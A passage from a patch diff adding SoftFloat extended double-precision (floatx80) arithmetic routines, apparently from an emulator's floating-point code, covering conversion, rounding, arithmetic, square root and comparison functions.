`a' to the quadruple-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 floatx80_to_float128( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig, zSig0, zSig1; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float128_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat128( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + shift128Right( aSig<<1, 0, 16, &zSig0, &zSig1 ); + return packFloat128( aSign, aExp, zSig0, zSig1 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the extended double-precision floating-point value `a' to an integer, +| and returns the result as an extended quadruple-precision floating-point +| value. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_round_to_int( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t lastBitMask, roundBitsMask; + floatx80 z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aExp = extractFloatx80Exp( a ); + if ( 0x403E <= aExp ) { + if ( ( aExp == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) { + return propagateFloatx80NaN( a, a STATUS_VAR ); + } + return a; + } + if ( aExp < 0x3FFF ) { + if ( ( aExp == 0 ) + && ( (uint64_t) ( extractFloatx80Frac( a )<<1 ) == 0 ) ) { + return a; + } + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloatx80Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x3FFE ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) + ) { + return + packFloatx80( aSign, 0x3FFF, LIT64( 0x8000000000000000 ) ); + } + break; + case float_round_ties_away: + if (aExp == 0x3FFE) { + return packFloatx80(aSign, 0x3FFF, LIT64(0x8000000000000000)); + } + break; + case float_round_down: + return + aSign ? + packFloatx80( 1, 0x3FFF, LIT64( 0x8000000000000000 ) ) + : packFloatx80( 0, 0, 0 ); + case float_round_up: + return + aSign ? packFloatx80( 1, 0, 0 ) + : packFloatx80( 0, 0x3FFF, LIT64( 0x8000000000000000 ) ); + } + return packFloatx80( aSign, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x403E - aExp; + roundBitsMask = lastBitMask - 1; + z = a; + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z.low += lastBitMask>>1; + if ((z.low & roundBitsMask) == 0) { + z.low &= ~lastBitMask; + } + break; + case float_round_ties_away: + z.low += lastBitMask >> 1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloatx80Sign(z)) { + z.low += roundBitsMask; + } + break; + case float_round_down: + if (extractFloatx80Sign(z)) { + z.low += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z.low &= ~ roundBitsMask; + if ( z.low == 0 ) { + ++z.high; + z.low = LIT64( 0x8000000000000000 ); + } + if ( z.low != a.low ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the extended double- +| precision floating-point values `a' and `b'. If `zSign' is 1, the sum is +| negated before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static floatx80 addFloatx80Sigs( floatx80 a, floatx80 b, flag zSign STATUS_PARAM) +{ + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + int32 expDiff; + + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + expDiff = aExp - bExp; + if ( 0 < expDiff ) { + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) --expDiff; + shift64ExtraRightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) ++expDiff; + shift64ExtraRightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); + zExp = bExp; + } + else { + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + return a; + } + zSig1 = 0; + zSig0 = aSig + bSig; + if ( aExp == 0 ) { + normalizeFloatx80Subnormal( zSig0, &zExp, &zSig0 ); + goto roundAndPack; + } + zExp = aExp; + goto shiftRight1; + } + zSig0 = aSig + bSig; + if ( (int64_t) zSig0 < 0 ) goto roundAndPack; + shiftRight1: + shift64ExtraRightJamming( zSig0, zSig1, 1, &zSig0, &zSig1 ); + zSig0 |= LIT64( 0x8000000000000000 ); + ++zExp; + roundAndPack: + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the extended +| double-precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static floatx80 subFloatx80Sigs( floatx80 a, floatx80 b, flag zSign STATUS_PARAM ) +{ + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + int32 expDiff; + floatx80 z; + + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + expDiff = aExp - bExp; + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + zSig1 = 0; + if ( bSig < aSig ) goto aBigger; + if ( aSig < bSig ) goto bBigger; + return packFloatx80( STATUS(float_rounding_mode) == float_round_down, 0, 0 ); + bExpBigger: + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return packFloatx80( zSign ^ 1, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) ++expDiff; + shift128RightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); + bBigger: + sub128( bSig, 0, aSig, zSig1, &zSig0, &zSig1 ); + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) --expDiff; + shift128RightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); + aBigger: + sub128( aSig, 0, bSig, zSig1, &zSig0, &zSig1 ); + zExp = aExp; + normalizeRoundAndPack: + return + normalizeRoundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the extended double-precision floating-point +| values `a' and `b'. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_add( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign == bSign ) { + return addFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + else { + return subFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the extended double-precision floating- +| point values `a' and `b'. The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_sub( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign == bSign ) { + return subFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the extended double-precision floating- +| point values `a' and `b'. The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_mul( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + floatx80 z; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + bSign = extractFloatx80Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) + || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig ) == 0 ) goto invalid; + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 ); + normalizeFloatx80Subnormal( aSig, &aExp, &aSig ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) return packFloatx80( zSign, 0, 0 ); + normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); + } + zExp = aExp + bExp - 0x3FFE; + mul64To128( aSig, bSig, &zSig0, &zSig1 ); + if ( 0 < (int64_t) zSig0 ) { + shortShift128Left( zSig0, zSig1, 1, &zSig0, &zSig1 ); + --zExp; + } + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the extended double-precision floating-point +| value `a' by the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_div( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + uint64_t rem0, rem1, rem2, term0, term1, term2; + floatx80 z; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + bSign = extractFloatx80Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + goto invalid; + } + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return packFloatx80( zSign, 0, 0 ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + if ( ( aExp | aSig ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 ); + normalizeFloatx80Subnormal( aSig, &aExp, &aSig ); + } + zExp = aExp - bExp + 0x3FFE; + rem1 = 0; + if ( bSig <= aSig ) { + shift128Right( aSig, 0, 1, &aSig, &rem1 ); + ++zExp; + } + zSig0 = estimateDiv128To64( aSig, rem1, bSig ); + mul64To128( bSig, zSig0, &term0, &term1 ); + sub128( aSig, rem1, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + add128( rem0, rem1, 0, bSig, &rem0, &rem1 ); + } + zSig1 = estimateDiv128To64( rem1, 0, bSig ); + if ( (uint64_t) ( zSig1<<1 ) <= 8 ) { + mul64To128( bSig, zSig1, &term1, &term2 ); + sub128( rem1, 0, term1, term2, &rem1, &rem2 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + add128( rem1, rem2, 0, bSig, &rem1, &rem2 ); + } + zSig1 |= ( ( rem1 | rem2 ) != 0 ); + } + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the remainder of the extended double-precision floating-point value +| `a' with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_rem( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, zSign; + int32 aExp, bExp, expDiff; + uint64_t aSig0, aSig1, bSig; + uint64_t q, term0, term1, alternateASig0, alternateASig1; + floatx80 z; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig0 = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig0<<1 ) + || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + goto invalid; + } + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( (uint64_t) ( aSig0<<1 ) == 0 ) return a; + normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 ); + } + bSig |= LIT64( 0x8000000000000000 ); + zSign = aSign; + expDiff = aExp - bExp; + aSig1 = 0; + if ( expDiff < 0 ) { + if ( expDiff < -1 ) return a; + shift128Right( aSig0, 0, 1, &aSig0, &aSig1 ); + expDiff = 0; + } + q = ( bSig <= aSig0 ); + if ( q ) aSig0 -= bSig; + expDiff -= 64; + while ( 0 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig ); + q = ( 2 < q ) ? q - 2 : 0; + mul64To128( bSig, q, &term0, &term1 ); + sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); + shortShift128Left( aSig0, aSig1, 62, &aSig0, &aSig1 ); + expDiff -= 62; + } + expDiff += 64; + if ( 0 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig ); + q = ( 2 < q ) ? q - 2 : 0; + q >>= 64 - expDiff; + mul64To128( bSig, q<<( 64 - expDiff ), &term0, &term1 ); + sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); + shortShift128Left( 0, bSig, 64 - expDiff, &term0, &term1 ); + while ( le128( term0, term1, aSig0, aSig1 ) ) { + ++q; + sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); + } + } + else { + term1 = 0; + term0 = bSig; + } + sub128( term0, term1, aSig0, aSig1, &alternateASig0, &alternateASig1 ); + if ( lt128( alternateASig0, alternateASig1, aSig0, aSig1 ) + || ( eq128( alternateASig0, alternateASig1, aSig0, aSig1 ) + && ( q & 1 ) ) + ) { + aSig0 = alternateASig0; + aSig1 = alternateASig1; + zSign = ! zSign; + } + return + normalizeRoundAndPackFloatx80( + 80, zSign, bExp + expDiff, aSig0, aSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the square root of the extended double-precision floating-point +| value `a'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_sqrt( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, zExp; + uint64_t aSig0, aSig1, zSig0, zSig1, doubleZSig0; + uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; + floatx80 z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig0 = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig0<<1 ) ) return propagateFloatx80NaN( a, a STATUS_VAR ); + if ( ! aSign ) return a; + goto invalid; + } + if ( aSign ) { + if ( ( aExp | aSig0 ) == 0 ) return a; + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + if ( aExp == 0 ) { + if ( aSig0 == 0 ) return packFloatx80( 0, 0, 0 ); + normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 ); + } + zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFF; + zSig0 = estimateSqrt32( aExp, aSig0>>32 ); + shift128Right( aSig0, 0, 2 + ( aExp & 1 ), &aSig0, &aSig1 ); + zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); + doubleZSig0 = zSig0<<1; + mul64To128( zSig0, zSig0, &term0, &term1 ); + sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + doubleZSig0 -= 2; + add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); + } + zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); + if ( ( zSig1 & LIT64( 0x3FFFFFFFFFFFFFFF ) ) <= 5 ) { + if ( zSig1 == 0 ) zSig1 = 1; + mul64To128( doubleZSig0, zSig1, &term1, &term2 ); + sub128( rem1, 0, term1, term2, &rem1, &rem2 ); + mul64To128( zSig1, zSig1, &term2, &term3 ); + sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + shortShift128Left( 0, zSig1, 1, &term2, &term3 ); + term3 |= 1; + term2 |= doubleZSig0; + add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); + } + zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); + } + shortShift128Left( 0, zSig1, 1, &zSig0, &zSig1 ); + zSig0 |= doubleZSig0; + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), 0, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is equal +| to the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_eq( floatx80 a, floatx80 b STATUS_PARAM ) +{ + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) + || (extractFloatx80Exp(a) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(a) << 1)) + || (extractFloatx80Exp(b) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(b) << 1)) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is +| less than or equal to the corresponding value `b', and 0 otherwise. The +| invalid exception is raised if either operand is a NaN. The comparison is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_le( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) + || (extractFloatx80Exp(a) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(a) << 1)) + || (extractFloatx80Exp(b) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(b) << 1)) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is +| less than the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_lt( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) + || (extractFloatx80Exp(a) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(a) << 1)) + || (extractFloatx80Exp(b) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(b) << 1)) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point values `a' and `b' +| cannot be compared, and 0 otherwise. The invalid exception is raised if +| either operand is a NaN. The comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ +int floatx80_unordered( floatx80 a, floatx80 b STATUS_PARAM ) +{ + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) + || (extractFloatx80Exp(a) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(a) << 1)) + || (extractFloatx80Exp(b) == 0x7FFF + && (uint64_t) (extractFloatx80Frac(b) << 1)) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is +| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_eq_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) + || ( ( extractFloatx80Exp( b ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) + ) { + if ( floatx80_is_signaling_nan( a ) + || floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is less +| than or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs +| do not cause an exception. Otherwise, the comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_le_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) + || ( ( extractFloatx80Exp( b ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) + ) { + if ( floatx80_is_signaling_nan( a ) + || floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point value `a' is less +| than the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause +| an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int floatx80_lt_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) + || ( ( extractFloatx80Exp( b ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) + ) { + if ( floatx80_is_signaling_nan( a ) + || floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the extended double-precision floating-point values `a' and `b' +| cannot be compared, and 0 otherwise. Quiet NaNs do not cause an exception. +| The comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ +int floatx80_unordered_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return 1; + } + if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) + || ( ( extractFloatx80Exp( b ) == 0x7FFF ) + && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) + ) { + if ( floatx80_is_signaling_nan( a ) + || floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the 32-bit two's complement integer format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 float128_to_int32( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig0, aSig1; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = 